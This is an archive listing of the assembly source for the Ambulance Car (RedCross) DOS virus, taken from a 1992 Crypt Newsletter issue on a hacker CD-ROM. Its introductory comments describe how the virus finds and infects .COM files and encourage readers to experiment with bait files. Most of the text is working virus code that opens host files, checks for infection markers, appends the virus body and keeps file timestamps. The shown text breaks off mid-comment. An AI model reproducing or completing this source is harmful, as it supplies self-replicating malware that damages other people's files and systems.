Hackers Underworld 2: Forbidden Knowledge

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Underworld 2: Forbidden Knowledge / Hackers Underworld 2: Forbidden Knowledge.iso / VIRUS / AMBUL.ASM < prev next >

Wrap

Assembly Source File | 1992-12-03 | 23KB | 524 lines

;REDCROSS/AMBULANCE CAR VIRUS for Crypt Newsletter #10, edited by Urnst Kouch ;December 1992 ;Originally supplied as a Sourcer disassembly in a Scandinavian virus mag ;published by "Youth Against McAfee (YAM)", this AMBULANCE specimen was ;generated in its raw form by "Natas Kaupas." Hold that up to your mirror ;and it spells Satan. Whatever, "Natas/Satan" has also supplied us with the ;MINDLESS/FamR series of viruses for you trivia buffs. The Crypt Newsletter ;is obliged to him, wherever he is, for these interesting programs. ; ;In any case, while helpful, the original disassembly had diminished ;value, being completely uncommented. It did, however, assemble ;under TASM into an actual working copy of the virus, which ;appears to be the AMBULANCE CAR B strain. ; ; ;Ambulance Car remains an interesting virus, packed with enough features ;so that it can still find its target files, .COM executables, wherever ;they might be lurking on a system. ; ;Principally, this revolves around the virus searching the path string set ;in the environment. If no path exists, the virus defaults to the ;current directory. In both cases, the virus may infect up to two files ;anywhere on the path per pass. Most times it will infect only one. ;Sometimes it will not budge at all. ; ;Once it's found a file, Ambulance checks it for the 0E9h byte at ;the beginning. If it doesn't find it, the virus assumes the file is ;uninfected and immediately tries to complete the infection. If ;it does find the byte, it continues reading from there to confirm ;the viral sequence. If this is a coincidence and the complete sequence ;is not there, the virus will infect the file anyway. ; ;Randomly, the virus will activate and run the Ambulance across the bottom ;of your screen after a round of infection. Because of the path search ;Ambulance can easily find .COM executables on a sizeable disk at a time ;when there are less and less of these to be seen. Unfortunately, for a ;direct-action virus, the disk activity is noticeable with the caveats: ;on a fast machine, perhaps not; or in front of an average user, perhaps not. ;You never know how a user will react when dealing with viruses. ; ;You can easily experiment with this version on your machine by commenting ;out the path statement in your AUTOEXEC.BAT. This will restrict the ;virus to a test directory where it can be used to infect bait files ;until the Ambulance effect is seen. ; ;Ambulance Car is detected by "rules-based" anti-virus sentries like ;PCRx (reviewed in this issue), but keep in mind this type of ;protection is not flawless. Accidents can happen. Most current scanners ;easily detect this variant of Ambulance, although ;some cannot disinfect files once they are parasitized. data_1e equ 0Ch data_2e equ 49h data_3e equ 6Ch psp_envirn_seg equ 2Ch data_21e equ 0C80h virus segment byte public assume cs:virus, ds:virus org 100h redcross proc far ;main flow control procedure for Ambulance ;Car virus start: jmp short virstart data_5 dw 4890h ; Data table data_7 dw 6C65h ; Data table db 6Ch, 6Fh, 20h, 2Dh, 20h copyright db 'Copyright S & S Enterprises, 198';whoah, how'd Solomon's db '8' ;stamp get in here? ;-] db 0Ah, 0Dh, 24h, 1Ah,0B4h, 09h db 0BAh, 03h, 01h,0CDh, 21h,0CDh db 20h virstart: db 0E8h, 01h, 00h add [bp-7Fh],bx out dx,al ; port 0, channel 0 add ax,[bx+di] call check_infect ; do path search, infect file call check_infect ; ditto, sometimes, sometimes not call sound_fury ; do we do AMBULANCE effect? Check! lea bx,[si+419h] mov di,100h mov al,[bx] mov [di],al mov ax,[bx+1] mov [di+1],ax jmp di ; Register jump exit: retn ; handoff to host redcross endp ;***************************************************************************** ; SUBROUTINE ;***************************************************************************** check_infect proc near ; path search for Ambulance call loadpath ; Car mov al,byte ptr data_19[si] or al,al jz exit ; No path/no files? Git! lea bx,[si+40Fh] inc word ptr [bx] lea dx,[si+428h] ; load effective address mov ax,3D02h int 21h ; open found file by loadpath read/write ; with handle mov word ptr ds:[417h][si],ax ;ax contains handle mov bx,word ptr ds:[417h][si] mov cx,3 lea dx,[si+414h] ; load address of buffer mov ah,3Fh ; to read first three bytes into. int 21h ; Read the bytes . . . ; bx points to file handle. ; mov al,byte ptr ds:[414h][si] cmp al,0E9h ; compare with 0E9h jne infect ; if not equal, assume virus not here - infect mov dx,word ptr ds:[415h][si] mov bx,word ptr ds:[417h][si] add dx,3 xor cx,cx ; zero register mov ax,4200h int 21h ; point to beginning of file, again ; bx contains the handle mov bx,word ptr ds:[417h][si] mov cx,6 lea dx,[si+41Ch] ; load effective address mov ah,3Fh ; and read the first 6 bytes int 21h ; this time ; ds:dx points to buffer mov ax,data_13[si] mov bx,data_14[si] mov cx,data_15[si] cmp ax,word ptr ds:[100h][si] ; compare with data copied above jne infect ; jump if not equal to infect cmp bx,data_5[si] jne infect ; jump if not equal cmp cx,data_7[si] je close ; finally, if we get a match we know infect: ; we're here, so go to close up mov bx,word ptr ds:[417h][si] xor cx,cx ; zero register xor dx,dx ; zero register mov ax,4202h int 21h ; reset pointer to end of file ; bx contains file handle sub ax,3 mov word ptr ds:[412h][si],ax mov bx,word ptr ds:[417h][si] mov ax,5700h ; bx points to name of file int 21h ; get file date and time ; time returns in cx, date in dx push cx ; push these onto the stack push dx ; we'll need 'em later mov bx,word ptr ds:[417h][si] mov cx,319h lea dx,[si+100h] mov ah,40h ; write th